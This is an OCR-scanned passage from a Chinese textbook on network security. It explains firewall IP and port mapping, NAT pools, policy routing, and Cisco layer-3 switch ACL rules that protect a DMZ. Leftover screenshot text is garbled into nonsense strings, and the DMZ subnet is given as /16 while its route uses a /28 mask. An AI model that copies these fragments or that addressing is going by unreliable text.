hE 201”, 在 “ 源 地 址 转换 为 ”下拉 框 中 选择 “不 转换 ”选项 ,在 “公开 地 址 映射 为 ”下拉 框 中 选 
择 “ 手 动 输入 "选项 ,然后 在 下 面 的 IP 地址 "输入 框 中 输入 公 网 地 址 映射 到 的 内 网 地 址 , 比 
如 192. 168. 172. 114。 对 于 “日 志 记录 ?选项 ,可 根据 需要 进行 勾 选 ,设置 好 后 的 配置 界面 如 
图 3.9 所 示 。 最 后 单 击 “ 确 定 ” 按 钮 ,完成 IP 映射 安全 规则 的 添加 。 


( 1-64 位 字母 、 汉字 星 个 汉字 为 ?位 ) 、 数字 、 减 号 、 
TARIAS ) 


EJ 


下 映射 地 十 201 


手工 输入 
亚 地 址 192 168_172 114 
L] 


图 3.9 配置 IP 映射 安全 规则 


在 安全 规则 管理 页 面 单 击 “移动 ”按钮 .可 将 选中 的 规则 移动 到 指定 的 位 置 。 通 过 该 项 
功能 ,可 将 同类 的 安全 规则 移动 到 相 邻 的 位 置 ,以 方便 查看 。 
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在 安全 规则 列表 的 最 后 一 列 , 提 供 了 一 些 功 能 操作 图 标 。 单 击 加 图标, 可 再 次 打开 如 
图 3.9 所 示 的 配置 页 面 ,实现 对 该 安全 规则 的 编辑 修改 ; 单 击 面 图标 ,可 删除 该 条 安全 规 
则 ; 单 击 se 图 标 ,将 使 该 条 规则 不 生效 ,此 时 图 标 变 为 器 ; 再 次 单 击 咒 图 标 ,该 条 规则 将 重 
新 生效 ,此 时 图 标 变 为 wx。 

@ 配置 端口 映射 。 利 用 PCAnyWhere 客户 端 软件 登录 连接 PCAnyWhere 服务 端 , 实 
现 对 服务 端 所 在 主机 的 远程 桌面 控制 ,在 服务 端 必须 开放 TCP 和 UDP 协议 的 5631 和 
5632 端口 。 

现 假设 要 将 某 公 网 地 址 的 TCP 和 UDP 协议 的 5631 和 5632 端口 ,对 应 地 映射 到 内 网 
中 的 192.168. 168. 15 主机 的 TCP 和 UDP 的 5631 和 5632 端口 ,实现 在 因特网 通过 该 公 网 
地 址 的 这 些 端口 ,访问 到 内 网 中 的 192. 168. 168. 15 主机 的 远程 桌面 ,其 配置 方法 和 配置 步 
又 如 下 所 示 o 

a. 在 接口 IP 组 中 定义 该 公 网 地 址 的 别名 ,比如 定义 为 “端口 映射 地 址 1207. 

b. 在 左 侧 的 菜单 栏 中 ,依次 选择 “对 象 定义 ”>“ 服 务 ” 一 “服务 列表 ”选项 ,此 时 将 打开 
如 图 3. 10 所 示 的 服务 列表 定义 窗口 。 在 “名 称 ” 输 入 框 中 输入 定义 服务 端口 列表 的 别名 , 比 
如 输入 TCPUDP5631-5632”。 选 中 “基本 服务 " 单 选 按钮 ,然后 在 下 面 的 端口 服务 列表 中 定 
义 要 开放 的 服务 端口 ,定义 完毕 后 , 单 击 “确定 ”按钮 ,完成 对 服务 列表 的 定义 。 


+ 名 称 :TCPUDP5631-5632 ( 1-64 位 字母 、 汉 字 ( 螺 个 汉字 为 ?位 ) 、 数 字 、 马 号 、 下 姑 n893 合 ) 
动态 服务 
spie -|+ WO: (€ 0-65535 ) 
Ime 
* 类 型 (type) ANY 
AEB (code) : 


© 基本 服务 
RS hu 


充 成 @ internet | 保护 模式 : 禁用 R100% ~ 
图 3. 10 定义 服务 端口 列表 
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c. 添加 安全 规则 ,规则 类 型 选择 为 “端口 映射 >。 配 置 方法 如 图 3. 11 所 示 ,配置 好 后 ， 
单 击 “ 确 定 ” 按 钮 ,完成 该 条 端口 映射 安全 规则 的 添加 ,到 此 为 止 ,端口 映射 就 配置 好 了 。 


TCPUDP5631-5632 


m E [了 TIWA _ ] 


?对 外 服务 映射 为 :| TCPUDP5631-5632 
k... 1 E | 


图 3.11 配置 端口 映射 安全 规则 


公 网 IP 地 址 的 剩余 端口 ,比如 TCP 80、TCP 20 和 TCP 21 等 ,还 可 采用 同样 的 配置 方 
法 ,将 其 端口 映射 到 内 网 中 的 其 他 主机 的 对 应 端口 。 

@ 配置 NAT 规则 。 要 使 局 域 网 内 网 用 户 能 访问 因特网 ,必须 在 防火 墙 上 配置 NAT 
安全 规则 ,实现 NAT 功能 。NAT 安全 规则 的 配置 步骤 和 方法 如 下 所 示 。 

a. 定义 NAT 地 址 池 。TCP 的 端口 范围 为 0 一 65535,0 一 1023 的 端口 为 标准 服务 所 使 
用 的 端口 ,一 般 不 用 于 NAT 转换 ,因此 ,理论 上 ,一 个 公 网 IP 地 址 可 代理 64512 个 TCP 连 
接 。 当 局 域 网 用 户 数量 较 多 、 网 络 规模 比较 大 时 ,内 网 用 户 发 起 的 TCP 连接 数 也 是 相当 大 
的 ,在 如 图 3. 2 所 示 的 网 络 中 ,其 TCP 连接 数 已 快 达到 40 万 个 ,对 于 这 样 的 网 络 ,使 用 单个 
公 网 地 址 或 者 4 个 公 网 地 址 构成 NAT 地 址 池 都 是 不 够 的 ,至 少 也 要 8 个 连续 的 IP 地 址 构 
成 NAT 地 址 池 才 能 胜任 。 可 从 申请 到 的 公 网 地 址 中 划分 出 一 个 具有 8 个 地 址 的 子 网 来 用 
作 NAT 地 址 池 。 

在 左 侧 的 菜单 栏 中 ,依次 选择 “对 象 定义 ”一 “地 址 ”>“NAT 地 址 池 ” 菜 单项 ,打开 NAT 
地 址 池 管理 页 面 , 然 后 在 该 管理 页 面 中 单 击 * 添 加 ”按钮 ,打开 添加 "NAT 地 址 池 ” 页 面 ,如 
图 3.12 所 示 。 

在 “名 称 ” 输 入 框 中 可 为 该 NAT 地 址 池 定 义 一 个 名 称 。 本 例 是 联通 的 网 络 出 口 , 故 命 
名 为 “联通 ”, 在 “备注 ”输入 框 中 输入 “联通 NAT 地 址 池 ”。 对 NAT 地 址 池 中 的 网 络 地 址 的 
定义 有 两 种 方法 ,第 一 种 方法 是 输入 网 络 地 址 和 子 网 掩 码 来 表达 ,第 二 种 方法 是 输入 NAT 
地 址 池 的 开始 地 址 和 结束 地 址 来 表达 ,注意 IP 地 址 必须 是 同一 个 子 网 的 地 址 且 必 须 连续 。 
NAT 地 址 池 定 义 好 后 , 单 击 “确定 ”按钮 ,添加 该 NAT 地 址 池 。 

b. 将 NAT 地 址 池 定 义 到 接口 IP 组 。 在 左 侧 的 菜单 栏 中 ,依次 选择 “对象 定义 ”>“ 地 
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址 ”一 接口 组 ”菜单 项 ,打开 接口 IP 组 管理 页 面 .然后 在 该 页 面 单 击 “ 添 加 ”按钮 ,添加 一 
个 新 的 接口 耳 组 ,将 接口 IP 组 命名 为 “SFP1 联通 ”, 在 “接口 IP 和 NAT 地 址 池 列 表 ” 列 表 
框 中 选择 “联通 ”NAT 地 址 池 ,然后 单 击 列表 框 右 侧 的 “二 二 ”按钮 ,将 “联通 ”NAT 地 址 池 添 
加 到 该 接口 IP 组 中 ,如 图 3. 13 所 示 , 最 后 单 击 “ 确 定 ” 按 钮 ,完成 新 接口 IP 组 的 定义 和 添加 。 


| 添加 WAT 地 址 池 


【 1-64 位 字母 、 汉字 螺 个 汉字 为 ?位 ) AF RS 
TAHIRNAA ) 


名 称 :5FP1 联 通 Pia 字母 、 汉字 量 个 汉字 为 2 位 )、 AF E TAANA 


IHARA 


@ internet | 保护 模式 : 禁用 


图 3.13 将 NAT 地 址 池 添 加 定义 到 接口 IP H 


c 定义 内 网 地 址 列表 和 地 址 组 。 在 定义 地 址 组 之 前 ,应 先 定义 地 址 列表 。 可 根据 内 网 
的 网 络 地 址 段 来 分 别 定义 地 址 列表 。 假 设 某 单位 使 用 的 内 网 地 址 段 为 192. 168. 0. 0/21 和 
192. 168. 128. 0/17, 则 需要 定义 两 个 内 网 地 址 列表 。 

依次 选择 “对 象 定义 ”>“ 地 址 ”一 “地 址 列表 ”菜单 项 ,打开 地 址 列表 管理 页 面 ,在 该 页 面 
中 单 击 “ 添 加 ”按钮 ,打开 地 址 列表 的 定义 页 面 .如 图 3. 14 所 示 。 

在 “名 称 ” 输 入 框 中 输入 要 定义 地 址 列表 的 名 称 ,在 “ 正 向 地 址 "输入 框 中 输入 网 络 地 址 
和 子 网 掩 码 。 在 "备注 ?输入 框 中 输入 备注 说 明 信 息 .然后 单 击 “ 确 定 ” 按 钮 ,完成 地 址 列表 的 
定义 和 添加 。 然 后 用 同样 的 方法 ,定义 添加 名 称 为 “内 网 地 址 2 的 地 址 列表 ,所 定义 的 网 络 
地 址 为 192. 168. 128. 0/255. 255. 128.0。 
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内 网 地 址 1 (1-64 位 字母 、 汉 字 ( 泗 个 汉字 为 ?位 ) 、 数字 、 K 


号 、 下 姓 运 98 合 ) 


© [192.168.0.0 _ 255. 255. 248. 0 = 


Ej 


@ internet | 保护 模式 : 禁用 


图 3.14 定义 内 网 地 址 列表 


内 网 地 址 列表 定义 好 后 ,将 内 网 地 址 列表 再 合并 定义 为 一 个 地 址 组 。 选 择 “ 地 址 组 ” 菜 
单项 ,打开 地 址 组 管理 页 面 ,然后 单 击 “ 添 加 ”按钮 ,打开 地 址 组 的 定义 页 面 ,如 图 3.15 所 示 。 
在 “名 称 ” 输 入 框 中 输入 和 定义 地 址 组 的 名 称 , 然 后 在 "地址 列表 ”中 将 前 面 定义 的 “内 网 地 址 1” 
和 “内 网 地 址 2” 添 加 到 地 址 组 中 ,最 后 单 击 “ 确 定 ” 按 钮 完成 地 址 组 的 定义 和 添加 。 


名 称 :| 内 同 地 址 pae 字母 、 汉 字 星 个 汉字 为 ?位 ) 、 rz. E TAANA 
) 


地 址 列表 地 址 组 成 员 


“| [ama 
内 网 地 址 2 


Peg 


@ internet | 保护 模式 禁用 


图 3.15 定义 地 址 组 


d. 添加 定义 NAT 规则 。 添 加 安全 规则 ,规则 类 型 选择 “NAT”, 如 图 3. 16 所 示 。 在 
“ 源 地 址 ?输入 框 中 选择 * 内 网 地 址 ?选项 “目的 地 址 ?输入 框 中 选择 any, “服务 ”输入 框 中 选 
择 any,“ 源 地 址 转换 为 ”输入 框 中 选择 “SFP1 联通 ”选项 , 勾 选 “日 志 记 录 ” 选 择 ,为 NAT 转 
换 增加 日 志 记录 ,最 后 单 击 “确定 ”按钮 , 即 可 完成 NAT 规则 的 添加 定义 。 

若 防 火 墙 有 多 个 因特网 出 口 , 则 采用 同样 的 方法 添加 配置 对 应 的 NAT 规则 即 可 。 

(3) 添加 配置 策略 路 由 

如 果 防 火 墙 只 有 一 个 因特网 出 口 , 则 只 需 添加 一 条 默认 路 由 ,路 由 的 下 一 跳 地 址 为 因 特 
网 出 口 的 网 关 地 址 。 如 果 防 火 墙 有 多 个 因特网 出 口 , 则 选择 一 个 出 口 作 为 默认 路 由 的 出 口 ， 
其 余 的 网 络 出 口 ,根据 出 口 能 到 达 的 目的 网 络 地 址 添加 配置 静态 路 由 即 可 。 
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Csi 字母 、 汉 字 侮 个 汉字 为 ?位 ) AF S 
TARIAS ) 


日 


图 3.16 添加 配置 NAT 规则 


在 左 侧 的 菜单 栏 中 ,依次 选择 “网 络 配置 ”一 “策略 路 由 ?菜单 项 ,打开 策略 路 由 的 管理 页 
面 。 在 该 页 面 中 , 单 击 * 添 加 ”按钮 ,添加 策略 路 由 ,如 图 3. 17 所 示 。 


图 3.17 添加 配置 策略 路 由 


若是 添加 配置 默认 路 由 , 则 目的 地 址 和 子 网 掩 码 均 设 置 为 0.0.0.0, 下 一 跳 地 址 设置 为 
因特网 出 口 的 网 关 地 址 , 即 与 防火 墙 的 该 接口 互联 的 对 端 地 址 ,设置 好 后 , 单 击 “ 确 定 ” 按 钮 ， 
完成 策略 路 由 的 添加 。 

源 路 由 是 根据 内 网 请 求 报 文 的 源 IP 地 址 ,来 配置 指定 通过 哪 一 条 出 口 出 去 访问 因 特 
网 。 一 般 只 有 在 有 特殊 需求 时 才 使 用 。 比 如 , 若 防火 墙 配置 内 网 用 户 默认 走 联通 出 口 访问 
因特网 ,但 又 要 实现 内 网 中 的 教 职 工 网 段 , 走 电信 网 络 出 口 访问 因特网 ,此 时 就 可 通过 配置 
源 路 由 来 实现 。 正 常情 况 下 , 当 有 多 条 因特网 出 口 时 ,一 般 是 根据 要 访问 的 目的 网 络 地址， 
通过 配置 策略 路 由 来 决定 通过 哪 一 条 出 口 出 去 访问 因特网 。 

通过 以 上 配置 之 后 ,防火 墙 就 可 正常 工作 了 .配置 完成 后 保存 配置 。 

6. 防火 墙 的 流量 查看 

依次 选择 “系统 监控 ”一 “网 络 接口 "菜单 项 ,打开 网 络 接口 流量 查看 页 面 , 即 可 查看 到 各 
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图 3.18 查看 各 网 络 接口 的 当前 流量 


人 @ imernet | SPT 禁用 16% ~ 


单 击 各 接口 的 “统计 图 "链接 ,可 查看 该 接口 的 历史 流量 ,如 图 3. 19 所 示 。 


127% arar Ht 


图 3.19 网 络 接口 的 历史 流量 统计 图 
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3.2.5 利用 三 层 交 换 机 配置 实现 防火 墙 功能 


1. 利用 三 层 交 换 机 作 防 火 墙 简介 

三 层 交 换 机 具有 路 由 和 IP 报 文 过 滤 功 能 ,因此 ,可 通过 配置 报 文 的 ACL 过 滤 规 则 来 实 
现 防火 墙 功能 。 由 于 交换 机 对 报 文 的 处 理 是 基于 硬件 的 ,因此 ,在 处 理 速度 和 性 能 方面 具有 
很 好 的 优势 ,而 且 价 廉 物 美 。 利 用 一 个 千 兆 的 三 层 交 换 机 , 即 可 构建 起 一 个 千 兆 的 防火 墙 ， 
这 个 交换 机 剩余 的 端口 还 可 用 作 其 他 用 途 。 

利用 三 层 交换 机 作 防 火 墙 的 不 足 之 处 在 于 对 防火 墙 过 滤 规 则 的 后 期 维护 和 管理 , 比 
如 要 修改 、 添 加 或 删除 部 分 规则 ,相对 于 正规 防火 墙 的 Web 配置 页 面 而 言 , 要 显得 专业 但 
麻烦 一 些 。 

2. 配置 的 基本 步骤 

利用 三 层 交 换 机 配置 成 防火 墙 的 方法 比较 简单 ,其 基本 步骤 如 下 。 

(1) 分 别 配 置 防火 墙 接口 的 IP 地址 。 

防火 墙 一 般 有 WAN、LAN 和 DMZ 3 个 基本 的 网 络 接口 。 可 将 三 层 交 换 机 的 某 3 个 端 
口 分 别 配置 定义 成 WAN LAN 和 DMZ 端口 来 使 用 ,比如 用 交换 机 的 前 3 个 端口 。 

在 端口 用 途 规划 好 后 ,就 可 将 各 端口 的 互联 接口 地 址 配置 在 各 端口 上 。 在 配置 IP Hb hl: 
之 前 ,注意 先 将 端口 配置 成 路 由 工作 模式 ,交换 机 的 端口 默认 为 二 层 的 交换 模式 。 

(2) 分 别针 对 WAN LAN 和 DMZ 端口 的 报 文 流入 方向 配置 定义 ACL 规则 。 

每 个 端口 的 报 文 有 流入 (in) 和 流出 (out) 两 个 方向 ,一 般 可 选择 流入 的 方向 进行 报 文 
过 滤 。 

(3) 将 定义 好 的 ACL 过 滤 规 则 分 别 应 用 到 WAN .LAN 和 DMZ 端口 。 

(4) 配置 三 层 交 换 机 的 路 由 。 

局 域 网 由 于 网 络 结构 相对 固定 ,一 般 使 用 静态 路 由 。 可 根据 要 到 达 的 目的 网 络 地 址 配 
置 相应 的 静态 路 由 。 

经 过 这 4 步 之 后 ,三 层 交 换 机 就 可 起 到 防火 墙 的 功能 了 。 

3. 防火 墙 过 滤 规 则 配置 策略 与 规则 的 分 析 确定 方法 

(1) 防火 墙 过 滤 规 则 配置 策略 

防火 墙 过 滤 规 则 的 配置 策略 有 默认 禁止 和 默认 人 允许 两 种 。 选 择 哪 种 策略 主要 根据 应 用 
的 需要 ,看 哪 种 策略 所 表达 出 来 的 过 滤 规 则 较 少 。 一 般 选 择 默认 禁止 策略 。 

(2) 过 滤 规 则 的 分 析 确定 方法 

在 具体 配置 表达 过 滤 规 则 时 ,要 注意 TCP 连接 是 双向 的 ,有 出 去 的 访问 请 求 报 文 ,也 有 
从 对 方 回来 的 响应 报 文 ,要 根据 这 两 类 报 文 的 流向 以 及 所 经 过 的 端口 ,在 对 应 端口 上 配置 相 
应 的 规则 。 

假如 FastEthernet1/0/1 用 作 WAN 口 ,用 于 连接 因特网 ,所 要 应 用 的 规则 编号 为 101; 
FastEthernetl/0/2 用 作 LAN 口 , 用 于 连接 局 域 网 内 网 .所 要 应 用 的 规则 编号 为 102; 
FastEthernet1/0/3 用 作 DMZ 口 ,用 于 连接 DMZ 区 服务 器 群 的 接 入 交换 机 ,所 要 应 用 的 规 
则 编号 为 103。 

对 于 人 允许 局 域 网 内 网 用 户 访问 因特网 的 Web 服务 的 应 用 需求 ,对 其 过 滤 规 则 分 析 
如 下 。 
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O 内 网 用 户 访问 因特网 Web 服务 的 访问 请 求 报 文 ,通过 FastEthernet1/0/2 端口 流入 
(in) ,如 果 采 用 的 是 in 方向 的 过 滤 策 略 . 则 应 在 102 号 规则 中 表达 允许 该 类 报 文通 过 ,其 过 
滤 规 则 表达 为 : 


access - list 102 permit tcp any any eq 80 


访问 请 求 报 文 从 FastEthernet1/0/2 端口 流入 ,经 102 号 过 滤 规 则 的 检查 处 理 后 ,再 经 
交换 机 的 转发 ,从 FastEthernet1/0/1 端口 流出 进入 因特网 。 由 于 采取 的 是 对 in 方向 进行 
过 滤 , 对 于 out 方 向 ,就 不 用 再 进行 过 滤 处 理 了 。 

@ Web 访问 的 响应 报 文 从 FastEthernet1/0/1 端口 流入 ,因此 ,需要 在 FastEthernet1/0/1 
所 应 用 的 101 号 规则 中 ,添加 表达 允许 Web 响应 报 文通 过 的 规则 ,其 规则 表达 如 下 : 


access - list 101 permit tcp any eq 80 any 


通过 以 上 两 方面 的 配置 ,正常 的 Web 访问 服务 的 报 文 就 可 通过 防火 墙 而 不 受 影响 了 。 
其 余 常 用 的 标准 服务 (FTP、.SMTP、POP3、SSH TELNET 等 ) 的 配置 方法 与 此 相同 。 

@ 除了 内 网 用 户 对 因特网 的 访问 之 外 ,如 果 DMZ 区 还 有 服务 器 群 ,这 些 服务 器 群 可 被 
两 类 人 群 访问 , 即 因特网 用 户 和 局 域 网 内 网 用 户 。 下 面 以 因特网 用 户 访问 DMZ 区 中 的 
Web 服务 器 为 例 ,介绍 如 何 确定 和 配置 过 滤 规 则 。 

因特网 用 户 对 DMZ 区 中 的 Web 服务 器 的 访问 请 求 报 文 ,通过 FastEthernet1/0/1 端 
口 流 入 ,因此 应 在 101 号 规则 中 添加 配置 允许 该 类 报 文 通过 的 过 滤 规 则 ,其 过 滤 规 则 表 

access - list 101 permit tcp any any eq 80 


访问 请 求 报 文 经 交换 机 的 转发 后 .从 FastEthernet1/0/3 端口 流出 到 达 DMZ 区 中 的 服 
务 器 。 服 务 器 的 响应 报 文 从 FastEthernet1/0/3 端口 流入 ,因此 ,需要 在 103 号 规则 中 添加 
配置 允许 Web 服务 的 响应 报 文通 过 的 过 滤 规 则 ,其 过 滤 规 则 表达 如 下 : 


access - list 103 permit tcp any eq 80 any 


经 过 以 上 配置 ,内 网 用 户 就 可 正常 访问 因特网 中 的 Web 服务 器 ,也 可 正常 访问 自己 局 
域 网 DMZ 区 中 的 服务 器 了 。 因 特 网 用 户 也 可 正常 访问 DMZ 区 中 的 Web 服务 器 。 

其 他 允许 访问 的 服务 的 配置 方法 与 此 相同 。 对 于 没有 在 规则 中 明确 表达 允许 通过 的 报 
文 , 则 默认 禁止 通过 ,因此 ,在 101,102 和 103 号 规则 集 的 最 后 ,要 添加 一 条 默认 禁止 通行 的 
规则 ,其 规则 表达 方法 如 下 所 示 : 


access - list 101 deny ip any any 


4. 配置 实例 

(1) 案例 网 络 拓扑 

本 配置 案例 的 网 络 拓扑 如 图 3. 20 所 示 。 在 本 网 络 拓扑 结构 中 ,防火 墙 使 用 一 台 三 层 交 
换 机 充当 ,用 于 对 DMZ 区 中 的 服务 器 群 提供 安全 保护 。 

在 本 结构 中 ,防火 墙 不 提供 对 内 网 用 户 的 保护 。 内 网 用 户 通 过 NAT 转换 访问 因特网 ， 
因特网 用 户 是 无 法 直接 访问 局 域 网 内 网 的 ,因此 ,内 网 用 户 不 用 考虑 来 自 因特网 的 攻击 。 而 
DMZ 区 中 的 服务 器 由 于 使 用 的 是 合法 有 效 的 公 网 地 址 ,因特网 用 户 是 可 以 访问 到 DMZ 区 
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中 的 服务 器 的 ,为 保护 服务 器 的 安全 稳定 运行 , 故 必须 有 防火 墙 的 安全 保护 。 


Fa0/1 811 172.16.0.5/30 

172.16.0.6/30 
Fa0/ 

Gig0/2 


172.16.0.2/30 


172.16.0.10/30 
Gigo/l 3560-24PS 
Firewall 


Fa0/1 


Gigon 172.16.0.1/30 
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Core-Switch 


图 3.20 案例 网 络 拓扑 结构 


(2) 防火 墙 配置 要 求 


配置 防火 墙 ,允许 内 网 用 户 和 因特网 用 户 访问 DMZ 区 中 的 服务 器 的 Web 服务 、FTP 
服务 .DNS 服务 和 邮件 服务 ,允许 ping DMZ 区 中 的 服务 器 ,允许 内 网 用 户 访问 DMZ 区 服 
务 器 的 TCP 和 UDP 协议 的 5631 和 5632 端口 ,允许 访问 DMZ 区 中 的 100. 100. 100. 3 服务 


器 的 SSH 服务 。 
(3) 防火 墙 配置 


下 面 以 Cisco 三 层 交 换 机 为 例 ,介绍 防火 墙 规则 的 具体 配置 方法 。 有 关 交 换 机 的 配置 
指令 的 功能 与 用 法 ,可 参阅 冯 昊 编写 的 (交换 机 /路 由 器 的 配置 与 管理 )( 第 2 版 ) (清华 大 学 


出 版 社 ) 。 
O 根据 网 络 接口 规划 配置 各 接口 的 IP 地 址 。 


! 进 入 特权 模式 

Switch > enable 

! 进 入 配置 模式 

Switch# config terminal 

! 更 改 交换 机 的 主机 名 为 firewall 
Switch(config) # hostname firewall 

! 启 用 IP 

firewall (config) # ip routing 

! 选 择 要 配置 的 FastEthernet0/1 接口 
firewall (config) # interface fastEthernet 0/1 
! 配 置 接口 的 工作 模式 为 路 由 模式 
firewall (config— if)#no switchport 
! 配 置 接口 的 IP 地址 


88 


172.16.0.9/30 


3560-24PS 


Server-PT 
WebServer 
100.100.100.2 


DMZ 


Server-PT 
WebServer 
100.100.100.3 


第 3 章 通信 子 网 安全 防范 


firewall (config— if)# ip address 172.16. 0. 6 255.255.255.252 
! 选 择 要 配置 的 gigabitEthernet 0/1 接口 ,并 配置 接口 IP 地 址 
firewall (config) # interface gigabitEthernet 0/1 

firewall (config- if) # no switchport 

firewall (config - if) # ip address 172.16.0.2 255.255. 255. 252 

! 选 择 要 配置 的 gigabitEthernet 0/2 接口 ,并 配置 接口 IP 地 址 
firewall (config) interface gigabitEthernet 0/2 

firewall (config- if) # no switchport 

firewall (config- if) # ip address 172.16. 0. 10 255.255.255. 252 


@ 配置 定义 各 ACL 规则 。 
a 配置 定义 101 号 规则 集 ,该 规则 将 应 用 于 FastEthernet0/1 接口 。 以 下 规则 定义 命 


令 , 在 交换 机 的 配置 模式 下 执行 。 


! 配 置 允许 因特网 用 户 访问 DMZ 区 服务 器 的 标准 服务 

access - list 101 permit tcp any any eq 20 

access - list 101 permit tcp any any eq 21 

access - list 101 permit tcp any any eq 80 

access - list 101 permit tcp any any eq 443 

access - list 101 permit tcp any any eq 25 

access - list 101 permit tcp any any eq 110 

access - list 101 permit tcp any any eq 53 

access - list 101 permit udp any any eq 53 

! 配 置 允许 因特网 用 户 访问 100. 100. 100. 3 服务 器 的 SSH 服务 
access - list 101 permit tcp any host 100.100.100.3 eq 22 
! 配 置 允许 因特网 用 户 ping DMZ 区 中 的 服务 器 

access - list 101 permit icmp any any 

! 配 置 允许 内 网 用 户 或 DMZ 区 服务 器 主动 访问 因特网 的 标准 服务 的 响应 报 文 回来 
access - list 101 permit tcp any eq 20 any 

access - list 101 permit tcp any eq 21 any 

access - list 101 permit tcp any eq 80 any 

access - list 101 permit tcp any eq 443 any 

access - list 101 permit tcp any eq 1433 any 

access - list 101 permit tcp any eq 25 any 

access - list 101 permit tcp any eq 110 any 

access - list 101 permit tcp any eq 53 any 

access - list 101 permit udp any eq 53 any 

access - list 101 permit tcp any eq 22 any 

! 配 置 默认 禁止 策略 


access - list 101 deny ip any any 

b. 配置 定义 102 号 规则 集 , 该 规则 将 应 用 于 Gig0/1 接口 。 

在 局 域 网 内 网 没有 服务 器 的 情况 下 ,从 Gig0/1 端口 流入 的 报 文 , 均 是 内 网 用 户 的 访问 
请 求 报 文 。 在 102 号 规则 中 ,应 配置 允许 通过 的 正常 访问 请 求 报 文 。 


! 配 置 允许 内 网 用 户 访问 DMZ 区 访问 请 求 报 文通 过 
access - list 102 permit tcp any any eq 20 
access - list 102 permit tcp any any eq 21 
access - list 102 permit tcp any any eq 80 
access - list 102 permit tcp any any eq 443 
access - list 102 permit tcp any any eq 1433 
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access - list 102 permit tcp any any eq 25 

access - list 102 permit tcp any any eq 110 

access - list 102 permit tcp any any eq 53 

access - list 102 permit udp any any eq 53 

! 配 置 允 许 内 网 用 户 访问 DMZ 区 服务 器 的 TCP 和 UDP 协议 的 5631 和 5632 端口 
access - list 102 permit tcp any any range 5631 5632 

access - list 102 permit udp any any range 5631 5632 

! 配 置 允许 内 网 用 户 访问 100. 100.100. 3 服务 器 的 SSH 服务 的 访问 请 求 报 文通 过 
access - list 102 permit tcp any host 100.100.100.3 eq 22 

! 配 置 允许 ping DMZ 区 中 的 服务 器 

access - list 102 permit icmp any any 

! 配 置 默认 禁止 策略 


access - list 102 deny ip any any 


c 配置 定义 103 号 规则 集 ,该 规则 将 应 用 于 Gig0/2 接口 。 
从 Gig0/2 端口 流入 的 报 文 有 两 类 ,一 类 是 因特网 用 户 或 内 网 用 户 访问 DMZ 区 服务 器 


的 响应 报 文 , 人 允许 访问 的 服务 的 响应 报 文 应 配置 成 允许 通过 。 另 一 类 是 DMZ 区 中 的 服务 
器 作为 一 台 主 机 ,主动 访问 因特网 服务 时 所 发 出 的 访问 请 求 报 文 。 
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! 配 置 允许 访问 的 标准 服务 的 响应 报 文通 过 
access - list 103 permit tcp any eq 20 any 
access - list 103 permit tcp any eq 21 any 
access - list 103 permit tcp any eq 80 any 
access - list 103 permit tcp any eq 443 any 
access - list 103 permit tcp any eq 1433 any 
access - list 103 permit tcp any eq 53 any 
access - list 103 permit udp any eq 53 any 
access - list 103 permit tcp any eq 25 any 
access - list 103 permit tcp any eq 110 any 

! 配 置 允许 访问 100.100. 100. 3 服务 器 的 22 号 端口 的 响应 报 文通 过 
access - list 103 permit tcp host 100.100.100.3 eq 22 any 
! 配 置 允许 icmp 报 文通 过 

access - list 103 permit icmp any any 

! 配 置 允许 DMZ 区 服务 器 的 主动 访问 请 求 报 文通 过 
access - list 103 permit tcp any any eq 80 
access - list 103 permit tcp any any eq 443 
access - list 103 permit tcp any any eq 1433 
access - list 103 permit tcp any any eq 21 
access - list 103 permit tcp any any eq 20 
access - list 103 permit udp any any eq 53 
access - list 103 permit tcp any any eq 53 
access - list 103 permit tcp any any eq 25 
access - list 103 permit tcp any any eq 110 

! 配 置 默认 禁止 策略 


access - list 103 deny ip any any 


© 将 各 规则 分 别 应 用 到 接口 的 in 方向 ,让 过 滤 规 则 生效 。 


firewall (config) # interface fastEthernet 0/1 
firewall (config- if) # ip access - group 101 in 
firewall (config- if) # interface GigabitEthernet0/1 


firewall (config- if) # ip access - group 102 in 

firewall (config- if) # interface GigabitEthernet0/2 

firewall (config - if) # ip access - group 103 in 

firewall (config - if) # end 

! 保 存 配置 

firewall # write 

(4) 配置 防火 墙 路 由 

防火 墙 有 3 个 网 络 接口 ,连接 了 3 个 网 络 , 应 根据 各 网 络 出 口 可 到 达 的 目标 网 络 地 址 来 
配置 静态 路 由 。 通 常 将 到 因特网 的 路 由 配置 成 默认 路 由 。 

假设 局 域 网 使 用 的 网 络 地 址 为 192. 168. 0. 0/16,DMZ 区 服务 器 所 使 用 的 网 络 地 址 为 
100. 100. 100. 0/16 , 则 路 由 的 配置 如 下 所 示 。 

进入 交换 机 的 配置 模式 ,然后 依次 执行 以 下 配置 命令 : 

ip route 0.0.0.0 0.0.0.0 172.16.0.5 

ip route 192.168.0.0 255.255.0.0 172.16.0.1 

ip route 100.100.100.0 255.255.255.240 172.16.0.9 

配置 完成 后 ,退出 配置 模式 ,执行 write 命令 保存 配置 。 这 样 ,防火 墙 就 配置 好 了 。 

(5) 防火 墙 的 后 期 维护 与 管理 

防火 墙 的 后 期 维护 与 管理 主要 是 对 防火 墙 的 过 滤 规 则 ,根据 应 用 的 需求 ,添加 、 修 改 或 
删除 过 滤 规 则 。 

要 对 过 滤 规 则 进行 维护 管理 ,可 采取 以 下 步骤 和 方法 。 

O 在 接口 上 取消 对 规则 的 应 用 。 要 对 哪 一 个 规则 集 进行 修改 , 则 应 先 在 相应 的 接口 上 
取消 对 该 规则 集 的 应 用 。 例 如 ,车 要 修改 102 号 规则 , 则 应 在 GigabitEthernet0/1 接口 上 ， 
取消 对 102 号 规则 的 应 用 ,其 实现 的 配置 命令 为 : 

firewall (config) # interface GigabitEthernet0/1 

firewall (config- if) # no ip access - group 102 in 

© 在 特权 模式 下 ,执行 show run 命令 ,显示 交换 机 的 配置 ,然后 找到 要 修改 的 规则 集 ， 
将 整个 规则 集 复制 到 剪贴 板 。 接 下 来 在 桌面 创建 一 个 文本 文件 ,将 刚才 复制 的 规则 集 粘贴 
到 新 建 的 文本 文件 中 ,并 在 该 文本 文件 中 对 规则 集 进 行 添加 、 修 改 或 删除 操作 。 

@ 进入 交换 机 的 配置 模式 ,将 要 修改 的 规则 集 删 除 。 例 如 , 若 要 修改 的 规则 集 是 102， 
则 删除 整个 102 号 规则 集 的 实现 命令 为 : 


firewall(config) # no access- list 102 


@ 将 经 过 编辑 修改 后 的 规则 ,重新 添加 定义 到 交换 机 中 。 实 现 的 操作 方法 为 : 在 文本 
文件 中 ,将 编辑 修改 好 的 规则 集 全 部 选中 ,然后 复制 到 剪贴 板 ; 接 下 来 进入 交换 机 的 配置 模 
